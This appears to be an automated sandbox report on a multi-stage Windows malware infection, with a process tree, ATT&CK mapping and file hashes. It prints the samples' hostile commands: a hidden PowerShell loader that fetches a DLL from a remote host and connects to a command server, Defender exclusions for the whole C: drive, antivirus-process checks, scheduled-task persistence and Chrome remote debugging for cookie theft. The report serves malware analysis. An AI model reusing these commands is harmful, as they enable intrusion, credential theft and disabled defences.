Hidden Files and Directories

T1564.001

pid	Process
13188	attrib.exe

C:\Users\Admin\AppData\Local\Temp\random.exe
"C:\Users\Admin\AppData\Local\Temp\random.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:868
- C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1652
- - C:\Users\Admin\AppData\Local\Temp\10299370101\RrRYo50.exe
    "C:\Users\Admin\AppData\Local\Temp\10299370101\RrRYo50.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2084
  - - C:\Users\Admin\AppData\Local\Temp\06a5c50e21\tgvazx.exe
      "C:\Users\Admin\AppData\Local\Temp\06a5c50e21\tgvazx.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:388
- - C:\Users\Admin\AppData\Local\Temp\10299380101\tK0oYx3.exe
    "C:\Users\Admin\AppData\Local\Temp\10299380101\tK0oYx3.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:4312
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:4296
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:392
- - C:\Users\Admin\AppData\Local\Temp\10299390101\d3jhg_003.exe
    "C:\Users\Admin\AppData\Local\Temp\10299390101\d3jhg_003.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:3528
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3596
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4540
  - - C:\Windows\system32\svchost.exe
      "C:\Windows\system32\svchost.exe"
      4⤵
      Downloads MZ/PE file
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:2224
    - - C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        5⤵
        Executes dropped EXE
        
        PID:3688
    - - C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        5⤵
        Deletes itself
        Executes dropped EXE
        
        PID:1900
      - C:\Users\Admin\AppData\Local\Temp\{e9624974-2f1e-45af-a2d0-b771aea93234}\4009c6a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{e9624974-2f1e-45af-a2d0-b771aea93234}\4009c6a.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        6⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:5528
        
        C:\Users\Admin\AppData\Local\Temp\{40073387-d7f2-4917-8053-52a6bf13ea2b}\fa36580e.exe
        
        C:/Users/Admin/AppData/Local/Temp/{40073387-d7f2-4917-8053-52a6bf13ea2b}/\fa36580e.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        7⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Enumerates connected drives
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:5640
- - C:\Users\Admin\AppData\Local\Temp\10299400101\k3t05Da.exe
    "C:\Users\Admin\AppData\Local\Temp\10299400101\k3t05Da.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5288
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\File.bat" "
      4⤵
      Drops startup file
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:9268
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cDovLzE5Ni4yNTEuOTEuNDIvdXAvdXBsb2Fkcy9lbmNyeXB0aW9uMDIuanBn'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('httpss.myvnc.com', '1907');"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:10340
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ohbuGGy.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:9444
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ohbuGGy" /XML "C:\Users\Admin\AppData\Local\Temp\tmpAB6E.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:9520
  - - C:\Users\Admin\AppData\Local\Temp\10299400101\k3t05Da.exe
      "C:\Users\Admin\AppData\Local\Temp\10299400101\k3t05Da.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:9896
- - C:\Users\Admin\AppData\Local\Temp\10299410101\wjfOfXh.exe
    "C:\Users\Admin\AppData\Local\Temp\10299410101\wjfOfXh.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5188
- - C:\Users\Admin\AppData\Local\Temp\10299420101\ARxx7NW.exe
    "C:\Users\Admin\AppData\Local\Temp\10299420101\ARxx7NW.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:11892
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5464
  - - C:\Program Files\RuntimeApp\0000003312.exe
      "C:\Program Files\RuntimeApp\0000003312.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:12824
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10299430141\4wAPcC0.ps1"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:10032
  - - C:\Windows\system32\windowspowershell\v1.0\powershell.exe
      "C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:7504
- - C:\Users\Admin\AppData\Local\Temp\10299440101\OkH8IPF.exe
    "C:\Users\Admin\AppData\Local\Temp\10299440101\OkH8IPF.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:2084
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:7572
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:7536
- - C:\Users\Admin\AppData\Local\Temp\10299450101\50KfF6O.exe
    "C:\Users\Admin\AppData\Local\Temp\10299450101\50KfF6O.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:6520
  - - C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Local\Temp\10299450101\50KfF6O.exe
      4⤵
      Views/modifies file attributes
      PID:13188
- - C:\Users\Admin\AppData\Local\Temp\10299460101\zx4PJh6.exe
    "C:\Users\Admin\AppData\Local\Temp\10299460101\zx4PJh6.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:11988
  - - C:\Windows\SysWOW64\CMD.exe
      "C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
      4⤵
      System Location Discovery: System Language Discovery
      PID:10924
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6892
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:7156
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:12884
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        5⤵
        
        PID:12972
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 440824
        5⤵
        
        PID:7820
    - - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Architecture.wmv
        5⤵
        
        PID:6532
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "Offensive" Inter
        5⤵
        
        PID:11884
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com
        5⤵
        
        PID:5876
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h
        5⤵
        
        PID:12868
    - - C:\Users\Admin\AppData\Local\Temp\440824\Organizations.com
        
        Organizations.com h
        5⤵
        
        PID:12052
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 12052 -s 900
        6⤵
        Program crash
        
        PID:12760
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        
        PID:10744
- - C:\Users\Admin\AppData\Local\Temp\10299470101\Kr9UTz2.exe
    "C:\Users\Admin\AppData\Local\Temp\10299470101\Kr9UTz2.exe"
    3⤵
    - Executes dropped EXE
    PID:10444
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:6252
- - C:\Users\Admin\AppData\Local\Temp\10299480101\weC48Q7.exe
    "C:\Users\Admin\AppData\Local\Temp\10299480101\weC48Q7.exe"
    3⤵
    PID:11688
  - - C:\Users\Admin\AppData\Local\Temp\onefile_11688_133871220218243526\windowscore.exe
      C:\Users\Admin\AppData\Local\Temp\10299480101\weC48Q7.exe
      4⤵
      PID:6456
- - C:\Users\Admin\AppData\Local\Temp\10299490101\c87182125e.exe
    "C:\Users\Admin\AppData\Local\Temp\10299490101\c87182125e.exe"
    3⤵
    PID:2016
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      PID:6356
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xf8,0xd8,0x7fff4d41dcf8,0x7fff4d41dd04,0x7fff4d41dd10
        5⤵
        
        PID:1568
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1908,i,788628141081659222,14428723539320114867,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1904 /prefetch:2
        5⤵
        
        PID:8784
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1544,i,788628141081659222,14428723539320114867,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2236 /prefetch:3
        5⤵
        
        PID:5420
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2356,i,788628141081659222,14428723539320114867,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2368 /prefetch:8
        5⤵
        
        PID:12548
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,788628141081659222,14428723539320114867,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3224 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:12884
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3452,i,788628141081659222,14428723539320114867,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3492 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:8120
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4392,i,788628141081659222,14428723539320114867,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4404 /prefetch:2
        5⤵
        Uses browser remote debugging
        
        PID:8456
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4668,i,788628141081659222,14428723539320114867,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4700 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:9552
- - C:\Users\Admin\AppData\Local\Temp\10299500101\c05026261b.exe
    "C:\Users\Admin\AppData\Local\Temp\10299500101\c05026261b.exe"
    3⤵
    PID:1512
- - C:\Users\Admin\AppData\Local\Temp\10299510101\30c3e325bd.exe
    "C:\Users\Admin\AppData\Local\Temp\10299510101\30c3e325bd.exe"
    3⤵
    PID:8440

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1092

C:\Users\Admin\AppData\Local\Temp\06a5c50e21\tgvazx.exe
C:\Users\Admin\AppData\Local\Temp\06a5c50e21\tgvazx.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:7820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAEQALQBtAFAAUABSAGUARgBlAFIAZQBOAEMARQAgAC0AZQBYAEMATAB1AFMASQBPAE4AcABBAFQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVAB5AHAAZQBJAGQAXABBAHQAdAByAGkAYgB1AHQAZQBzAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXAAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBmAG8AcgBDAGUAOwAgAGEARABkAC0AbQBQAFAAUgBFAEYARQBSAEUATgBDAEUAIAAtAEUAWABDAEwAVQBTAEkATwBuAHAAUgBPAEMARQBTAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABUAHkAcABlAEkAZABcAEEAdAB0AHIAaQBiAHUAdABlAHMALgBlAHgAZQAgAC0AZgBvAFIAQwBFAA==
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8164

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4452

C:\Users\Admin\AppData\Local\Temp\06a5c50e21\tgvazx.exe
C:\Users\Admin\AppData\Local\Temp\06a5c50e21\tgvazx.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:8784

C:\Users\Admin\AppData\Roaming\TypeId\Attributes.exe
C:\Users\Admin\AppData\Roaming\TypeId\Attributes.exe
1⤵
- Executes dropped EXE
PID:3180

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
1⤵
PID:8180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 12052 -ip 12052
1⤵
PID:6296

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:2180

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

T1556

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Safe Mode Boot

T1562.009

Modify Authentication Process

T1556

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe

Filesize
1.9MB

MD5
0d1af08f3e80600b823866f1a2fdc613

SHA1
4334f8087e35efd7a23eae3d56193e2f0741a003

SHA256
89918e8e7fcb36736ac63819fb5d45dab490f4c418f104e2a355dde6034ea90d

SHA512
008b1cd90024e9a2507c4e0c2602bb23e28dcb1de40edd36abb8cc258fb7aeb8e72776292c5ccb7d16196407c60b2a9ffdf10b6ef6dea4ffdef5d3c8b2ea9537

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
80KB

MD5
4485ecb42b6d315d155d84265515ebba

SHA1
2f17d373bcb93518db82183bab9a08c00e3c4d3a

SHA256
5da93037c65e15f5ad4f1e951cf2650957768dd7260ea08eddc902e8fd910477

SHA512
02451548844794e8761a01de58337d0364058c1cc36736f103bff3bc0dfe6e5cef5e3777ec58d77def909c62384f8c74e021f8254c724c0416d544a3696247c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\k3t05Da.exe.log

Filesize
1KB

MD5
400f1cc1a0a0ce1cdabda365ab3368ce

SHA1
1ecf683f14271d84f3b6063493dce00ff5f42075

SHA256
c8fa64f4b69df13ed6408fd4a204f318a36c2f38c85d4a4d42adfc9173f73765

SHA512
14c8cfd58d097e5e89c8cabe1e665173f1ccf604a9ef70cdcb84116e265f90819c19c891be408e0ad7e29086a5c2ea2883b7a7d1184878dbbac63e2cabcd1c45

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ada23d35e4a3f1bc35ac8d393cd02675

SHA1
88dd6ddecec82aeafba2b6368078c7c70b88fcac

SHA256
98d17949831dda7243aa8b24a66443eee75d0805996826290fbe1a75bfc79e72

SHA512
0acae33f83787122b779b8b1b41580f4595eb44c74ef0035949e3d90103fd22e15ed4af4238985bd58f8a0378dc8bce4d77549ca4bb661c2c515018be99a79e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
55ba280fff5b9309f6af860b7b4186d1

SHA1
e403f32a087c3a8f27f2598963b44a7785851538

SHA256
e65a49088644188e3538a2903fcb79f455db5473c4f13559ae323fbcf886ad2e

SHA512
0df036e32c50d7d270250c330582aae11f6196d1ff5bf02f6f24b23967bd5614f917d47aa60c9450433a98c2eb1c2abfecc8d0d0edbbd1307c49ca328de9d2a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\10299370101\RrRYo50.exe

Filesize
1.8MB

MD5
4dc058b80eaed363b315a70bbccb7ea0

SHA1
f82fe72244422163166cf3b5c3533698af0b95fb

SHA256
a57846d70d880ceaaf70f99826a55d7d0d2638e67c9070fe2ade3c60a831f8fa

SHA512
ecb815eb235f12ce6b9e04f44a112c7c548016d70fd620054bef14471397640fd17c59df9b57eabab648d1a3f9124171d8dec079f9c47de5be404d5cda5d4d80

Download Submit
C:\Users\Admin\AppData\Local\Temp\10299380101\tK0oYx3.exe

Filesize
1.1MB

MD5
292b5a2b7820688e131d541f18f48e84

SHA1
edb93c76c7edb5ebda65281f98fcc8e65ef3dbe5

SHA256
74c75de994a3d5033b78aa33774c8e85894869e12cd70376291dc0eb428fa7e8

SHA512
